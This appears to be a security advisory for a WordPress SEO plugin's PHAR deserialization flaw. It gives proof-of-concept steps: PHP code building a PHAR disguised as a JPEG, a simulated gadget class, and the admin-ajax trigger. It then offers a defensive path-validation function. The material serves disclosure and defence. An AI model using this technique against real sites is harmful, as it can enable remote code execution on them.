The plugin does not validate image file paths before attempting to manipulate the image files, leading to a PHAR deserialization vulnerability. Furthermore, the plugin contains a gadget chain which may be used in certain configurations to achieve remote code execution.
1. Use a WordPress instance on PHP 7.x.
2. Create a PHP file create_phar.php with the following code (the Evil class must also be declared in this script so that an instance of it can be serialized into the archive metadata):

    <?php
    // Minimal declaration; the gadget body itself is defined on the target site (step 6).
    class Evil {}

    $phar = new Phar('poc.phar');
    $phar->startBuffering();
    $phar->addFromString('test.png', 'text');
    // Stub begins with the JPEG magic bytes so the file passes as an image.
    $phar->setStub("\xff\xd8\xff\n");
    $phar->setMetadata(new Evil());
    $phar->stopBuffering();

3. Create the PHAR file poc.phar by running php --define phar.readonly=0 create_phar.php
4. Rename poc.phar to poc.jpg
5. Upload poc.jpg using the Media Editor. Take note of its path within wp-content/uploads.
6. Add the following code to the site in order to simulate a gadget:

    class Evil {
        public function __wakeup(): void {
            die('Arbitrary deserialization');
        }
    }

7. Create or edit a post or page in the block editor. Add an HTML block with the following contents (but replace any parts of the path to poc.jpg as needed for your test server).
8. Without saving the post or page, open the browser console to view network traffic, then click on "Reload Analysis" in the "SEO Page Optimization" section. Notice the admin-ajax request with action=wpms and task=reload_analysis returns with the text "Arbitrary deserialization", demonstrating the vulnerability.
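The root cause named above is the absence of any validation of the image path before the plugin touches the file. The following guard is an added example written for this page, not the plugin's own code or its fix: it rejects stream wrappers (phar:// among them), confines the resolved path to the uploads directory, allow-lists the extension, and refuses any file carrying the PHAR stub token even when it starts with image magic bytes, as poc.jpg does. The function name is hypothetical and $uploads_basedir is assumed to be the uploads directory (in WordPress, wp_upload_dir()['basedir']).

```php
<?php
// Added example (not the plugin's code): validate an image path before
// any image manipulation. Assumes $uploads_basedir is the uploads root,
// e.g. wp_upload_dir()['basedir'] in WordPress. Function name is hypothetical.

function example_is_safe_image_path(string $path, string $uploads_basedir): bool
{
    // 1. Reject stream wrappers. On PHP 7.x, file_exists(), is_file(),
    //    filesize(), getimagesize() and similar calls on a phar:// path
    //    unserialize the archive metadata before any content is read.
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $path) === 1) {
        return false;
    }

    // 2. Resolve symlinks and "../" segments, then confine the result to
    //    the uploads directory. realpath() never returns a wrapper path,
    //    so the is_file() call below operates on a plain filesystem path.
    $base = realpath($uploads_basedir);
    $real = realpath($path);
    if ($base === false || $real === false || !is_file($real)) {
        return false;
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return false;
    }

    // 3. Extension allow-list; the uploaded file name is attacker-chosen.
    $ext = strtolower(pathinfo($real, PATHINFO_EXTENSION));
    if (!in_array($ext, ['jpg', 'jpeg', 'png', 'gif', 'webp'], true)) {
        return false;
    }

    // 4. Content check. Magic bytes are not enough: the PoC stub starts
    //    with the JPEG signature "\xff\xd8\xff". Every PHAR archive must
    //    carry the literal token "__HALT_COMPILER();" in its stub so the
    //    manifest can be located, and no genuine image contains it.
    $contents = file_get_contents($real);
    if ($contents === false || strpos($contents, '__HALT_COMPILER') !== false) {
        return false;
    }

    return true;
}

// Assumed call site inside an AJAX handler, before any image work:
// if (!example_is_safe_image_path($image_path, wp_upload_dir()['basedir'])) {
//     wp_send_json_error('invalid image path');
// }
```

The wrapper check runs first because the dangerous deserialization happens inside ordinary filesystem calls, not only in unserialize(); on PHP 7.x even the realpath()/is_file() pair would be unsafe if the raw user-supplied string reached it. The content scan is the check that specifically catches the technique shown in step 2, where the JPEG magic prefix defeats a signature-only test.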